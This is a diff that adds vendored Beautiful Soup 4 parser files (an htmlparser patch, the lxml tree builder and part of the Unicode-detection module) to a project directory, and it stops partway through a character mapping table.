# XXX This code can be removed once most Python 3 users are on 3.2.3.
|
||||
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
|
||||
import re
|
||||
attrfind_tolerant = re.compile(
|
||||
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
|
||||
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
|
||||
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
|
||||
|
||||
locatestarttagend = re.compile(r"""
|
||||
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
|
||||
(?:\s+ # whitespace before attribute name
|
||||
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
|
||||
(?:\s*=\s* # value indicator
|
||||
(?:'[^']*' # LITA-enclosed value
|
||||
|\"[^\"]*\" # LIT-enclosed value
|
||||
|[^'\">\s]+ # bare value
|
||||
)
|
||||
)?
|
||||
)
|
||||
)*
|
||||
\s* # trailing whitespace
|
||||
""", re.VERBOSE)
|
||||
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
|
||||
|
||||
from html.parser import tagfind, attrfind
|
||||
|
||||
def parse_starttag(self, i):
|
||||
self.__starttag_text = None
|
||||
endpos = self.check_for_whole_start_tag(i)
|
||||
if endpos < 0:
|
||||
return endpos
|
||||
rawdata = self.rawdata
|
||||
self.__starttag_text = rawdata[i:endpos]
|
||||
|
||||
# Now parse the data between i+1 and j into a tag and attrs
|
||||
attrs = []
|
||||
match = tagfind.match(rawdata, i+1)
|
||||
assert match, 'unexpected call to parse_starttag()'
|
||||
k = match.end()
|
||||
self.lasttag = tag = rawdata[i+1:k].lower()
|
||||
while k < endpos:
|
||||
if self.strict:
|
||||
m = attrfind.match(rawdata, k)
|
||||
else:
|
||||
m = attrfind_tolerant.match(rawdata, k)
|
||||
if not m:
|
||||
break
|
||||
attrname, rest, attrvalue = m.group(1, 2, 3)
|
||||
if not rest:
|
||||
attrvalue = None
|
||||
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
|
||||
attrvalue[:1] == '"' == attrvalue[-1:]:
|
||||
attrvalue = attrvalue[1:-1]
|
||||
if attrvalue:
|
||||
attrvalue = self.unescape(attrvalue)
|
||||
attrs.append((attrname.lower(), attrvalue))
|
||||
k = m.end()
|
||||
|
||||
end = rawdata[k:endpos].strip()
|
||||
if end not in (">", "/>"):
|
||||
lineno, offset = self.getpos()
|
||||
if "\n" in self.__starttag_text:
|
||||
lineno = lineno + self.__starttag_text.count("\n")
|
||||
offset = len(self.__starttag_text) \
|
||||
- self.__starttag_text.rfind("\n")
|
||||
else:
|
||||
offset = offset + len(self.__starttag_text)
|
||||
if self.strict:
|
||||
self.error("junk characters in start tag: %r"
|
||||
% (rawdata[k:endpos][:20],))
|
||||
self.handle_data(rawdata[i:endpos])
|
||||
return endpos
|
||||
if end.endswith('/>'):
|
||||
# XHTML-style empty tag: <span attr="value" />
|
||||
self.handle_startendtag(tag, attrs)
|
||||
else:
|
||||
self.handle_starttag(tag, attrs)
|
||||
if tag in self.CDATA_CONTENT_ELEMENTS:
|
||||
self.set_cdata_mode(tag)
|
||||
return endpos
|
||||
|
||||
def set_cdata_mode(self, elem):
|
||||
self.cdata_elem = elem.lower()
|
||||
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
|
||||
|
||||
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
|
||||
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
|
||||
|
||||
CONSTRUCTOR_TAKES_STRICT = True
|
||||
248
PortalAuth/includes/scripts/libs/bs4/builder/_lxml.py
Executable file
248
PortalAuth/includes/scripts/libs/bs4/builder/_lxml.py
Executable file
@@ -0,0 +1,248 @@
|
||||
__all__ = [
|
||||
'LXMLTreeBuilderForXML',
|
||||
'LXMLTreeBuilder',
|
||||
]
|
||||
|
||||
from io import BytesIO
|
||||
from StringIO import StringIO
|
||||
import collections
|
||||
from lxml import etree
|
||||
from bs4.element import (
|
||||
Comment,
|
||||
Doctype,
|
||||
NamespacedAttribute,
|
||||
ProcessingInstruction,
|
||||
)
|
||||
from bs4.builder import (
|
||||
FAST,
|
||||
HTML,
|
||||
HTMLTreeBuilder,
|
||||
PERMISSIVE,
|
||||
ParserRejectedMarkup,
|
||||
TreeBuilder,
|
||||
XML)
|
||||
from bs4.dammit import EncodingDetector
|
||||
|
||||
LXML = 'lxml'
|
||||
|
||||
class LXMLTreeBuilderForXML(TreeBuilder):
|
||||
DEFAULT_PARSER_CLASS = etree.XMLParser
|
||||
|
||||
is_xml = True
|
||||
|
||||
NAME = "lxml-xml"
|
||||
ALTERNATE_NAMES = ["xml"]
|
||||
|
||||
# Well, it's permissive by XML parser standards.
|
||||
features = [NAME, LXML, XML, FAST, PERMISSIVE]
|
||||
|
||||
CHUNK_SIZE = 512
|
||||
|
||||
# This namespace mapping is specified in the XML Namespace
|
||||
# standard.
|
||||
DEFAULT_NSMAPS = {'http://www.w3.org/XML/1998/namespace' : "xml"}
|
||||
|
||||
def default_parser(self, encoding):
|
||||
# This can either return a parser object or a class, which
|
||||
# will be instantiated with default arguments.
|
||||
if self._default_parser is not None:
|
||||
return self._default_parser
|
||||
return etree.XMLParser(
|
||||
target=self, strip_cdata=False, recover=True, encoding=encoding)
|
||||
|
||||
def parser_for(self, encoding):
|
||||
# Use the default parser.
|
||||
parser = self.default_parser(encoding)
|
||||
|
||||
if isinstance(parser, collections.Callable):
|
||||
# Instantiate the parser with default arguments
|
||||
parser = parser(target=self, strip_cdata=False, encoding=encoding)
|
||||
return parser
|
||||
|
||||
def __init__(self, parser=None, empty_element_tags=None):
|
||||
# TODO: Issue a warning if parser is present but not a
|
||||
# callable, since that means there's no way to create new
|
||||
# parsers for different encodings.
|
||||
self._default_parser = parser
|
||||
if empty_element_tags is not None:
|
||||
self.empty_element_tags = set(empty_element_tags)
|
||||
self.soup = None
|
||||
self.nsmaps = [self.DEFAULT_NSMAPS]
|
||||
|
||||
def _getNsTag(self, tag):
|
||||
# Split the namespace URL out of a fully-qualified lxml tag
|
||||
# name. Copied from lxml's src/lxml/sax.py.
|
||||
if tag[0] == '{':
|
||||
return tuple(tag[1:].split('}', 1))
|
||||
else:
|
||||
return (None, tag)
|
||||
|
||||
def prepare_markup(self, markup, user_specified_encoding=None,
|
||||
exclude_encodings=None,
|
||||
document_declared_encoding=None):
|
||||
"""
|
||||
:yield: A series of 4-tuples.
|
||||
(markup, encoding, declared encoding,
|
||||
has undergone character replacement)
|
||||
|
||||
Each 4-tuple represents a strategy for parsing the document.
|
||||
"""
|
||||
if isinstance(markup, unicode):
|
||||
# We were given Unicode. Maybe lxml can parse Unicode on
|
||||
# this system?
|
||||
yield markup, None, document_declared_encoding, False
|
||||
|
||||
if isinstance(markup, unicode):
|
||||
# No, apparently not. Convert the Unicode to UTF-8 and
|
||||
# tell lxml to parse it as UTF-8.
|
||||
yield (markup.encode("utf8"), "utf8",
|
||||
document_declared_encoding, False)
|
||||
|
||||
# Instead of using UnicodeDammit to convert the bytestring to
|
||||
# Unicode using different encodings, use EncodingDetector to
|
||||
# iterate over the encodings, and tell lxml to try to parse
|
||||
# the document as each one in turn.
|
||||
is_html = not self.is_xml
|
||||
try_encodings = [user_specified_encoding, document_declared_encoding]
|
||||
detector = EncodingDetector(
|
||||
markup, try_encodings, is_html, exclude_encodings)
|
||||
for encoding in detector.encodings:
|
||||
yield (detector.markup, encoding, document_declared_encoding, False)
|
||||
|
||||
def feed(self, markup):
|
||||
if isinstance(markup, bytes):
|
||||
markup = BytesIO(markup)
|
||||
elif isinstance(markup, unicode):
|
||||
markup = StringIO(markup)
|
||||
|
||||
# Call feed() at least once, even if the markup is empty,
|
||||
# or the parser won't be initialized.
|
||||
data = markup.read(self.CHUNK_SIZE)
|
||||
try:
|
||||
self.parser = self.parser_for(self.soup.original_encoding)
|
||||
self.parser.feed(data)
|
||||
while len(data) != 0:
|
||||
# Now call feed() on the rest of the data, chunk by chunk.
|
||||
data = markup.read(self.CHUNK_SIZE)
|
||||
if len(data) != 0:
|
||||
self.parser.feed(data)
|
||||
self.parser.close()
|
||||
except (UnicodeDecodeError, LookupError, etree.ParserError), e:
|
||||
raise ParserRejectedMarkup(str(e))
|
||||
|
||||
def close(self):
|
||||
self.nsmaps = [self.DEFAULT_NSMAPS]
|
||||
|
||||
def start(self, name, attrs, nsmap={}):
|
||||
# Make sure attrs is a mutable dict--lxml may send an immutable dictproxy.
|
||||
attrs = dict(attrs)
|
||||
nsprefix = None
|
||||
# Invert each namespace map as it comes in.
|
||||
if len(self.nsmaps) > 1:
|
||||
# There are no new namespaces for this tag, but
|
||||
# non-default namespaces are in play, so we need a
|
||||
# separate tag stack to know when they end.
|
||||
self.nsmaps.append(None)
|
||||
elif len(nsmap) > 0:
|
||||
# A new namespace mapping has come into play.
|
||||
inverted_nsmap = dict((value, key) for key, value in nsmap.items())
|
||||
self.nsmaps.append(inverted_nsmap)
|
||||
# Also treat the namespace mapping as a set of attributes on the
|
||||
# tag, so we can recreate it later.
|
||||
attrs = attrs.copy()
|
||||
for prefix, namespace in nsmap.items():
|
||||
attribute = NamespacedAttribute(
|
||||
"xmlns", prefix, "http://www.w3.org/2000/xmlns/")
|
||||
attrs[attribute] = namespace
|
||||
|
||||
# Namespaces are in play. Find any attributes that came in
|
||||
# from lxml with namespaces attached to their names, and
|
||||
# turn then into NamespacedAttribute objects.
|
||||
new_attrs = {}
|
||||
for attr, value in attrs.items():
|
||||
namespace, attr = self._getNsTag(attr)
|
||||
if namespace is None:
|
||||
new_attrs[attr] = value
|
||||
else:
|
||||
nsprefix = self._prefix_for_namespace(namespace)
|
||||
attr = NamespacedAttribute(nsprefix, attr, namespace)
|
||||
new_attrs[attr] = value
|
||||
attrs = new_attrs
|
||||
|
||||
namespace, name = self._getNsTag(name)
|
||||
nsprefix = self._prefix_for_namespace(namespace)
|
||||
self.soup.handle_starttag(name, namespace, nsprefix, attrs)
|
||||
|
||||
def _prefix_for_namespace(self, namespace):
|
||||
"""Find the currently active prefix for the given namespace."""
|
||||
if namespace is None:
|
||||
return None
|
||||
for inverted_nsmap in reversed(self.nsmaps):
|
||||
if inverted_nsmap is not None and namespace in inverted_nsmap:
|
||||
return inverted_nsmap[namespace]
|
||||
return None
|
||||
|
||||
def end(self, name):
|
||||
self.soup.endData()
|
||||
completed_tag = self.soup.tagStack[-1]
|
||||
namespace, name = self._getNsTag(name)
|
||||
nsprefix = None
|
||||
if namespace is not None:
|
||||
for inverted_nsmap in reversed(self.nsmaps):
|
||||
if inverted_nsmap is not None and namespace in inverted_nsmap:
|
||||
nsprefix = inverted_nsmap[namespace]
|
||||
break
|
||||
self.soup.handle_endtag(name, nsprefix)
|
||||
if len(self.nsmaps) > 1:
|
||||
# This tag, or one of its parents, introduced a namespace
|
||||
# mapping, so pop it off the stack.
|
||||
self.nsmaps.pop()
|
||||
|
||||
def pi(self, target, data):
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(target + ' ' + data)
|
||||
self.soup.endData(ProcessingInstruction)
|
||||
|
||||
def data(self, content):
|
||||
self.soup.handle_data(content)
|
||||
|
||||
def doctype(self, name, pubid, system):
|
||||
self.soup.endData()
|
||||
doctype = Doctype.for_name_and_ids(name, pubid, system)
|
||||
self.soup.object_was_parsed(doctype)
|
||||
|
||||
def comment(self, content):
|
||||
"Handle comments as Comment objects."
|
||||
self.soup.endData()
|
||||
self.soup.handle_data(content)
|
||||
self.soup.endData(Comment)
|
||||
|
||||
def test_fragment_to_document(self, fragment):
|
||||
"""See `TreeBuilder`."""
|
||||
return u'<?xml version="1.0" encoding="utf-8"?>\n%s' % fragment
|
||||
|
||||
|
||||
class LXMLTreeBuilder(HTMLTreeBuilder, LXMLTreeBuilderForXML):
|
||||
|
||||
NAME = LXML
|
||||
ALTERNATE_NAMES = ["lxml-html"]
|
||||
|
||||
features = ALTERNATE_NAMES + [NAME, HTML, FAST, PERMISSIVE]
|
||||
is_xml = False
|
||||
|
||||
def default_parser(self, encoding):
|
||||
return etree.HTMLParser
|
||||
|
||||
def feed(self, markup):
|
||||
encoding = self.soup.original_encoding
|
||||
try:
|
||||
self.parser = self.parser_for(encoding)
|
||||
self.parser.feed(markup)
|
||||
self.parser.close()
|
||||
except (UnicodeDecodeError, LookupError, etree.ParserError), e:
|
||||
raise ParserRejectedMarkup(str(e))
|
||||
|
||||
|
||||
def test_fragment_to_document(self, fragment):
|
||||
"""See `TreeBuilder`."""
|
||||
return u'<html><body>%s</body></html>' % fragment
|
||||
839
PortalAuth/includes/scripts/libs/bs4/dammit.py
Executable file
839
PortalAuth/includes/scripts/libs/bs4/dammit.py
Executable file
@@ -0,0 +1,839 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
"""Beautiful Soup bonus library: Unicode, Dammit
|
||||
|
||||
This library converts a bytestream to Unicode through any means
|
||||
necessary. It is heavily based on code from Mark Pilgrim's Universal
|
||||
Feed Parser. It works best on XML and HTML, but it does not rewrite the
|
||||
XML or HTML to reflect a new encoding; that's the tree builder's job.
|
||||
"""
|
||||
|
||||
from pdb import set_trace
|
||||
import codecs
|
||||
from htmlentitydefs import codepoint2name
|
||||
import re
|
||||
import logging
|
||||
import string
|
||||
|
||||
# Import a library to autodetect character encodings.
|
||||
chardet_type = None
|
||||
try:
|
||||
# First try the fast C implementation.
|
||||
# PyPI package: cchardet
|
||||
import cchardet
|
||||
def chardet_dammit(s):
|
||||
return cchardet.detect(s)['encoding']
|
||||
except ImportError:
|
||||
try:
|
||||
# Fall back to the pure Python implementation
|
||||
# Debian package: python-chardet
|
||||
# PyPI package: chardet
|
||||
import chardet
|
||||
def chardet_dammit(s):
|
||||
return chardet.detect(s)['encoding']
|
||||
#import chardet.constants
|
||||
#chardet.constants._debug = 1
|
||||
except ImportError:
|
||||
# No chardet available.
|
||||
def chardet_dammit(s):
|
||||
return None
|
||||
|
||||
# Available from http://cjkpython.i18n.org/.
|
||||
try:
|
||||
import iconv_codec
|
||||
except ImportError:
|
||||
pass
|
||||
|
||||
xml_encoding_re = re.compile(
|
||||
'^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode(), re.I)
|
||||
html_meta_re = re.compile(
|
||||
'<\s*meta[^>]+charset\s*=\s*["\']?([^>]*?)[ /;\'">]'.encode(), re.I)
|
||||
|
||||
class EntitySubstitution(object):
|
||||
|
||||
"""Substitute XML or HTML entities for the corresponding characters."""
|
||||
|
||||
def _populate_class_variables():
|
||||
lookup = {}
|
||||
reverse_lookup = {}
|
||||
characters_for_re = []
|
||||
for codepoint, name in list(codepoint2name.items()):
|
||||
character = unichr(codepoint)
|
||||
if codepoint != 34:
|
||||
# There's no point in turning the quotation mark into
|
||||
# ", unless it happens within an attribute value, which
|
||||
# is handled elsewhere.
|
||||
characters_for_re.append(character)
|
||||
lookup[character] = name
|
||||
# But we do want to turn " into the quotation mark.
|
||||
reverse_lookup[name] = character
|
||||
re_definition = "[%s]" % "".join(characters_for_re)
|
||||
return lookup, reverse_lookup, re.compile(re_definition)
|
||||
(CHARACTER_TO_HTML_ENTITY, HTML_ENTITY_TO_CHARACTER,
|
||||
CHARACTER_TO_HTML_ENTITY_RE) = _populate_class_variables()
|
||||
|
||||
CHARACTER_TO_XML_ENTITY = {
|
||||
"'": "apos",
|
||||
'"': "quot",
|
||||
"&": "amp",
|
||||
"<": "lt",
|
||||
">": "gt",
|
||||
}
|
||||
|
||||
BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
|
||||
"&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
|
||||
")")
|
||||
|
||||
AMPERSAND_OR_BRACKET = re.compile("([<>&])")
|
||||
|
||||
@classmethod
|
||||
def _substitute_html_entity(cls, matchobj):
|
||||
entity = cls.CHARACTER_TO_HTML_ENTITY.get(matchobj.group(0))
|
||||
return "&%s;" % entity
|
||||
|
||||
@classmethod
|
||||
def _substitute_xml_entity(cls, matchobj):
|
||||
"""Used with a regular expression to substitute the
|
||||
appropriate XML entity for an XML special character."""
|
||||
entity = cls.CHARACTER_TO_XML_ENTITY[matchobj.group(0)]
|
||||
return "&%s;" % entity
|
||||
|
||||
@classmethod
|
||||
def quoted_attribute_value(self, value):
|
||||
"""Make a value into a quoted XML attribute, possibly escaping it.
|
||||
|
||||
Most strings will be quoted using double quotes.
|
||||
|
||||
Bob's Bar -> "Bob's Bar"
|
||||
|
||||
If a string contains double quotes, it will be quoted using
|
||||
single quotes.
|
||||
|
||||
Welcome to "my bar" -> 'Welcome to "my bar"'
|
||||
|
||||
If a string contains both single and double quotes, the
|
||||
double quotes will be escaped, and the string will be quoted
|
||||
using double quotes.
|
||||
|
||||
Welcome to "Bob's Bar" -> "Welcome to "Bob's bar"
|
||||
"""
|
||||
quote_with = '"'
|
||||
if '"' in value:
|
||||
if "'" in value:
|
||||
# The string contains both single and double
|
||||
# quotes. Turn the double quotes into
|
||||
# entities. We quote the double quotes rather than
|
||||
# the single quotes because the entity name is
|
||||
# """ whether this is HTML or XML. If we
|
||||
# quoted the single quotes, we'd have to decide
|
||||
# between ' and &squot;.
|
||||
replace_with = """
|
||||
value = value.replace('"', replace_with)
|
||||
else:
|
||||
# There are double quotes but no single quotes.
|
||||
# We can use single quotes to quote the attribute.
|
||||
quote_with = "'"
|
||||
return quote_with + value + quote_with
|
||||
|
||||
@classmethod
|
||||
def substitute_xml(cls, value, make_quoted_attribute=False):
|
||||
"""Substitute XML entities for special XML characters.
|
||||
|
||||
:param value: A string to be substituted. The less-than sign
|
||||
will become <, the greater-than sign will become >,
|
||||
and any ampersands will become &. If you want ampersands
|
||||
that appear to be part of an entity definition to be left
|
||||
alone, use substitute_xml_containing_entities() instead.
|
||||
|
||||
:param make_quoted_attribute: If True, then the string will be
|
||||
quoted, as befits an attribute value.
|
||||
"""
|
||||
# Escape angle brackets and ampersands.
|
||||
value = cls.AMPERSAND_OR_BRACKET.sub(
|
||||
cls._substitute_xml_entity, value)
|
||||
|
||||
if make_quoted_attribute:
|
||||
value = cls.quoted_attribute_value(value)
|
||||
return value
|
||||
|
||||
@classmethod
|
||||
def substitute_xml_containing_entities(
|
||||
cls, value, make_quoted_attribute=False):
|
||||
"""Substitute XML entities for special XML characters.
|
||||
|
||||
:param value: A string to be substituted. The less-than sign will
|
||||
become <, the greater-than sign will become >, and any
|
||||
ampersands that are not part of an entity defition will
|
||||
become &.
|
||||
|
||||
:param make_quoted_attribute: If True, then the string will be
|
||||
quoted, as befits an attribute value.
|
||||
"""
|
||||
# Escape angle brackets, and ampersands that aren't part of
|
||||
# entities.
|
||||
value = cls.BARE_AMPERSAND_OR_BRACKET.sub(
|
||||
cls._substitute_xml_entity, value)
|
||||
|
||||
if make_quoted_attribute:
|
||||
value = cls.quoted_attribute_value(value)
|
||||
return value
|
||||
|
||||
@classmethod
|
||||
def substitute_html(cls, s):
|
||||
"""Replace certain Unicode characters with named HTML entities.
|
||||
|
||||
This differs from data.encode(encoding, 'xmlcharrefreplace')
|
||||
in that the goal is to make the result more readable (to those
|
||||
with ASCII displays) rather than to recover from
|
||||
errors. There's absolutely nothing wrong with a UTF-8 string
|
||||
containg a LATIN SMALL LETTER E WITH ACUTE, but replacing that
|
||||
character with "é" will make it more readable to some
|
||||
people.
|
||||
"""
|
||||
return cls.CHARACTER_TO_HTML_ENTITY_RE.sub(
|
||||
cls._substitute_html_entity, s)
|
||||
|
||||
|
||||
class EncodingDetector:
|
||||
"""Suggests a number of possible encodings for a bytestring.
|
||||
|
||||
Order of precedence:
|
||||
|
||||
1. Encodings you specifically tell EncodingDetector to try first
|
||||
(the override_encodings argument to the constructor).
|
||||
|
||||
2. An encoding declared within the bytestring itself, either in an
|
||||
XML declaration (if the bytestring is to be interpreted as an XML
|
||||
document), or in a <meta> tag (if the bytestring is to be
|
||||
interpreted as an HTML document.)
|
||||
|
||||
3. An encoding detected through textual analysis by chardet,
|
||||
cchardet, or a similar external library.
|
||||
|
||||
4. UTF-8.
|
||||
|
||||
5. Windows-1252.
|
||||
"""
|
||||
def __init__(self, markup, override_encodings=None, is_html=False,
|
||||
exclude_encodings=None):
|
||||
self.override_encodings = override_encodings or []
|
||||
exclude_encodings = exclude_encodings or []
|
||||
self.exclude_encodings = set([x.lower() for x in exclude_encodings])
|
||||
self.chardet_encoding = None
|
||||
self.is_html = is_html
|
||||
self.declared_encoding = None
|
||||
|
||||
# First order of business: strip a byte-order mark.
|
||||
self.markup, self.sniffed_encoding = self.strip_byte_order_mark(markup)
|
||||
|
||||
def _usable(self, encoding, tried):
|
||||
if encoding is not None:
|
||||
encoding = encoding.lower()
|
||||
if encoding in self.exclude_encodings:
|
||||
return False
|
||||
if encoding not in tried:
|
||||
tried.add(encoding)
|
||||
return True
|
||||
return False
|
||||
|
||||
@property
|
||||
def encodings(self):
|
||||
"""Yield a number of encodings that might work for this markup."""
|
||||
tried = set()
|
||||
for e in self.override_encodings:
|
||||
if self._usable(e, tried):
|
||||
yield e
|
||||
|
||||
# Did the document originally start with a byte-order mark
|
||||
# that indicated its encoding?
|
||||
if self._usable(self.sniffed_encoding, tried):
|
||||
yield self.sniffed_encoding
|
||||
|
||||
# Look within the document for an XML or HTML encoding
|
||||
# declaration.
|
||||
if self.declared_encoding is None:
|
||||
self.declared_encoding = self.find_declared_encoding(
|
||||
self.markup, self.is_html)
|
||||
if self._usable(self.declared_encoding, tried):
|
||||
yield self.declared_encoding
|
||||
|
||||
# Use third-party character set detection to guess at the
|
||||
# encoding.
|
||||
if self.chardet_encoding is None:
|
||||
self.chardet_encoding = chardet_dammit(self.markup)
|
||||
if self._usable(self.chardet_encoding, tried):
|
||||
yield self.chardet_encoding
|
||||
|
||||
# As a last-ditch effort, try utf-8 and windows-1252.
|
||||
for e in ('utf-8', 'windows-1252'):
|
||||
if self._usable(e, tried):
|
||||
yield e
|
||||
|
||||
@classmethod
|
||||
def strip_byte_order_mark(cls, data):
|
||||
"""If a byte-order mark is present, strip it and return the encoding it implies."""
|
||||
encoding = None
|
||||
if isinstance(data, unicode):
|
||||
# Unicode data cannot have a byte-order mark.
|
||||
return data, encoding
|
||||
if (len(data) >= 4) and (data[:2] == b'\xfe\xff') \
|
||||
and (data[2:4] != '\x00\x00'):
|
||||
encoding = 'utf-16be'
|
||||
data = data[2:]
|
||||
elif (len(data) >= 4) and (data[:2] == b'\xff\xfe') \
|
||||
and (data[2:4] != '\x00\x00'):
|
||||
encoding = 'utf-16le'
|
||||
data = data[2:]
|
||||
elif data[:3] == b'\xef\xbb\xbf':
|
||||
encoding = 'utf-8'
|
||||
data = data[3:]
|
||||
elif data[:4] == b'\x00\x00\xfe\xff':
|
||||
encoding = 'utf-32be'
|
||||
data = data[4:]
|
||||
elif data[:4] == b'\xff\xfe\x00\x00':
|
||||
encoding = 'utf-32le'
|
||||
data = data[4:]
|
||||
return data, encoding
|
||||
|
||||
@classmethod
|
||||
def find_declared_encoding(cls, markup, is_html=False, search_entire_document=False):
|
||||
"""Given a document, tries to find its declared encoding.
|
||||
|
||||
An XML encoding is declared at the beginning of the document.
|
||||
|
||||
An HTML encoding is declared in a <meta> tag, hopefully near the
|
||||
beginning of the document.
|
||||
"""
|
||||
if search_entire_document:
|
||||
xml_endpos = html_endpos = len(markup)
|
||||
else:
|
||||
xml_endpos = 1024
|
||||
html_endpos = max(2048, int(len(markup) * 0.05))
|
||||
|
||||
declared_encoding = None
|
||||
declared_encoding_match = xml_encoding_re.search(markup, endpos=xml_endpos)
|
||||
if not declared_encoding_match and is_html:
|
||||
declared_encoding_match = html_meta_re.search(markup, endpos=html_endpos)
|
||||
if declared_encoding_match is not None:
|
||||
declared_encoding = declared_encoding_match.groups()[0].decode(
|
||||
'ascii', 'replace')
|
||||
if declared_encoding:
|
||||
return declared_encoding.lower()
|
||||
return None
|
||||
|
||||
class UnicodeDammit:
|
||||
"""A class for detecting the encoding of a *ML document and
|
||||
converting it to a Unicode string. If the source encoding is
|
||||
windows-1252, can replace MS smart quotes with their HTML or XML
|
||||
equivalents."""
|
||||
|
||||
# This dictionary maps commonly seen values for "charset" in HTML
|
||||
# meta tags to the corresponding Python codec names. It only covers
|
||||
# values that aren't in Python's aliases and can't be determined
|
||||
# by the heuristics in find_codec.
|
||||
CHARSET_ALIASES = {"macintosh": "mac-roman",
|
||||
"x-sjis": "shift-jis"}
|
||||
|
||||
ENCODINGS_WITH_SMART_QUOTES = [
|
||||
"windows-1252",
|
||||
"iso-8859-1",
|
||||
"iso-8859-2",
|
||||
]
|
||||
|
||||
def __init__(self, markup, override_encodings=[],
|
||||
smart_quotes_to=None, is_html=False, exclude_encodings=[]):
|
||||
self.smart_quotes_to = smart_quotes_to
|
||||
self.tried_encodings = []
|
||||
self.contains_replacement_characters = False
|
||||
self.is_html = is_html
|
||||
|
||||
self.detector = EncodingDetector(
|
||||
markup, override_encodings, is_html, exclude_encodings)
|
||||
|
||||
# Short-circuit if the data is in Unicode to begin with.
|
||||
if isinstance(markup, unicode) or markup == '':
|
||||
self.markup = markup
|
||||
self.unicode_markup = unicode(markup)
|
||||
self.original_encoding = None
|
||||
return
|
||||
|
||||
# The encoding detector may have stripped a byte-order mark.
|
||||
# Use the stripped markup from this point on.
|
||||
self.markup = self.detector.markup
|
||||
|
||||
u = None
|
||||
for encoding in self.detector.encodings:
|
||||
markup = self.detector.markup
|
||||
u = self._convert_from(encoding)
|
||||
if u is not None:
|
||||
break
|
||||
|
||||
if not u:
|
||||
# None of the encodings worked. As an absolute last resort,
|
||||
# try them again with character replacement.
|
||||
|
||||
for encoding in self.detector.encodings:
|
||||
if encoding != "ascii":
|
||||
u = self._convert_from(encoding, "replace")
|
||||
if u is not None:
|
||||
logging.warning(
|
||||
"Some characters could not be decoded, and were "
|
||||
"replaced with REPLACEMENT CHARACTER.")
|
||||
self.contains_replacement_characters = True
|
||||
break
|
||||
|
||||
# If none of that worked, we could at this point force it to
|
||||
# ASCII, but that would destroy so much data that I think
|
||||
# giving up is better.
|
||||
self.unicode_markup = u
|
||||
if not u:
|
||||
self.original_encoding = None
|
||||
|
||||
def _sub_ms_char(self, match):
|
||||
"""Changes a MS smart quote character to an XML or HTML
|
||||
entity, or an ASCII character."""
|
||||
orig = match.group(1)
|
||||
if self.smart_quotes_to == 'ascii':
|
||||
sub = self.MS_CHARS_TO_ASCII.get(orig).encode()
|
||||
else:
|
||||
sub = self.MS_CHARS.get(orig)
|
||||
if type(sub) == tuple:
|
||||
if self.smart_quotes_to == 'xml':
|
||||
sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
|
||||
else:
|
||||
sub = '&'.encode() + sub[0].encode() + ';'.encode()
|
||||
else:
|
||||
sub = sub.encode()
|
||||
return sub
|
||||
|
||||
def _convert_from(self, proposed, errors="strict"):
|
||||
proposed = self.find_codec(proposed)
|
||||
if not proposed or (proposed, errors) in self.tried_encodings:
|
||||
return None
|
||||
self.tried_encodings.append((proposed, errors))
|
||||
markup = self.markup
|
||||
# Convert smart quotes to HTML if coming from an encoding
|
||||
# that might have them.
|
||||
if (self.smart_quotes_to is not None
|
||||
and proposed in self.ENCODINGS_WITH_SMART_QUOTES):
|
||||
smart_quotes_re = b"([\x80-\x9f])"
|
||||
smart_quotes_compiled = re.compile(smart_quotes_re)
|
||||
markup = smart_quotes_compiled.sub(self._sub_ms_char, markup)
|
||||
|
||||
try:
|
||||
#print "Trying to convert document to %s (errors=%s)" % (
|
||||
# proposed, errors)
|
||||
u = self._to_unicode(markup, proposed, errors)
|
||||
self.markup = u
|
||||
self.original_encoding = proposed
|
||||
except Exception as e:
|
||||
#print "That didn't work!"
|
||||
#print e
|
||||
return None
|
||||
#print "Correct encoding: %s" % proposed
|
||||
return self.markup
|
||||
|
||||
def _to_unicode(self, data, encoding, errors="strict"):
|
||||
'''Given a string and its encoding, decodes the string into Unicode.
|
||||
%encoding is a string recognized by encodings.aliases'''
|
||||
return unicode(data, encoding, errors)
|
||||
|
||||
@property
|
||||
def declared_html_encoding(self):
|
||||
if not self.is_html:
|
||||
return None
|
||||
return self.detector.declared_encoding
|
||||
|
||||
def find_codec(self, charset):
|
||||
value = (self._codec(self.CHARSET_ALIASES.get(charset, charset))
|
||||
or (charset and self._codec(charset.replace("-", "")))
|
||||
or (charset and self._codec(charset.replace("-", "_")))
|
||||
or (charset and charset.lower())
|
||||
or charset
|
||||
)
|
||||
if value:
|
||||
return value.lower()
|
||||
return None
|
||||
|
||||
def _codec(self, charset):
|
||||
if not charset:
|
||||
return charset
|
||||
codec = None
|
||||
try:
|
||||
codecs.lookup(charset)
|
||||
codec = charset
|
||||
except (LookupError, ValueError):
|
||||
pass
|
||||
return codec
|
||||
|
||||
|
||||
# A partial mapping of ISO-Latin-1 to HTML entities/XML numeric entities.
|
||||
MS_CHARS = {b'\x80': ('euro', '20AC'),
|
||||
b'\x81': ' ',
|
||||
b'\x82': ('sbquo', '201A'),
|
||||
b'\x83': ('fnof', '192'),
|
||||
b'\x84': ('bdquo', '201E'),
|
||||
b'\x85': ('hellip', '2026'),
|
||||
b'\x86': ('dagger', '2020'),
|
||||
b'\x87': ('Dagger', '2021'),
|
||||
b'\x88': ('circ', '2C6'),
|
||||
b'\x89': ('permil', '2030'),
|
||||
b'\x8A': ('Scaron', '160'),
|
||||
b'\x8B': ('lsaquo', '2039'),
|
||||
b'\x8C': ('OElig', '152'),
|
||||
b'\x8D': '?',
|
||||
b'\x8E': ('#x17D', '17D'),
|
||||
b'\x8F': '?',
|
||||
b'\x90': '?',
|
||||
b'\x91': ('lsquo', '2018'),
|
||||
b'\x92': ('rsquo', '2019'),
|
||||
b'\x93': ('ldquo', '201C'),
|
||||
